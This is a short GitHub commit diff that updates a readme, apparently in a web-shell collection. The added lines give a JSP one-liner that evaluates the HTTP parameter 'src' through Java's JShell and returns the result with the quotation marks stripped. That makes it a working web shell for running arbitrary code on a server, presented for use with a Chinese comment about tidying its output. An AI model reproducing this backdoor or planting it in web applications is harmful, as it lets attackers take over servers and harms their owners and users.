Update readme.md

This commit is contained in:
tennc 2019-10-08 15:30:13 +08:00 committed by GitHub
parent 3d0824a806
commit 5c2f32773f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -6,5 +6,8 @@ readme
如果强迫症想撸掉多余的输出:
```
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
```
from: http://p2j.cn/?p=1874